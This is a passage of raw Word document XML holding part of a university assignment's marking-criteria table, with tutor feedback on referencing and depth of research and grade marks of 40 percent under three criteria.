                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3F7E8" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"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976736" w:rsidRPr="00976736" w14:paraId="5C5FDC8B" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10670" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="4F0A6209" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:caps/>
                <w:sz w:val="40"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">                 marking criteria and Student FEEDBACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="649CA233" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68077955" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976736">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This section details the assessment criteria. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00976736">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extent</w:t>
      </w:r>
      <w:r w:rsidRPr="00976736">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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1C6A6EC" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9274"/>
        <w:gridCol w:w="592"/>
        <w:gridCol w:w="590"/>
      </w:tblGrid>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="674849E5" w14:textId="77777777" w:rsidTr="00D3092C">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CFE5492" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Common Assessment Criteria </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Applied </w:t>
            </w:r>
            <w:bookmarkStart w:id="24" w:name="assessmentComponent"/>
            <w:bookmarkEnd w:id="24"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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3FF3EA9" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:ind w:left="34" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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21386CC" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Marks </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72274328" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>awarded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="7394F033" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="5B47B37A" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Research-informed Literature</w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68BD2EA0" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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CB2B220" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri"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E685516" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="5E208427" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33CFD21C" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="25" w:name="feedbackRIL"/>
            <w:bookmarkEnd w:id="25"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Your</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> referencing not consistently applied (lack of in-text citations). (Grade mark: 40.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46BC4022" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="26" w:name="totalRIL"/>
            <w:bookmarkEnd w:id="26"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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3EF52886" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="27" w:name="markRIL"/>
            <w:bookmarkEnd w:id="27"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="49FDB170" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="207AC674" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="211C1467" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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D47791A" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="01118A25" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="248CEB1C" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Knowledge and Understanding of Subject</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D244758" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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3D1E153" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri"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5BDE547" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="0FC63FB3" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18ED6D82" w14:textId="1ED0BFFD" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="28" w:name="feedbackKUS"/>
            <w:bookmarkEnd w:id="28"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evidence </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>of knowledge</w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp; understanding of the main theories and concept but required more depth of the research. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="678ED351" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Grade mark: 40.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D4DAD84" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="29" w:name="totalKUS"/>
            <w:bookmarkEnd w:id="29"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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58069671" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="30" w:name="markKUS"/>
            <w:bookmarkEnd w:id="30"/>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="79E92769" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="438676EA" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="188CD463" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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DBCAA96" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="300C0816" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="0099EF25" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7805A1" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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37CCB42" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri"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58E52D2" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="37715955" w14:textId="77777777" w:rsidTr="00D3092C">
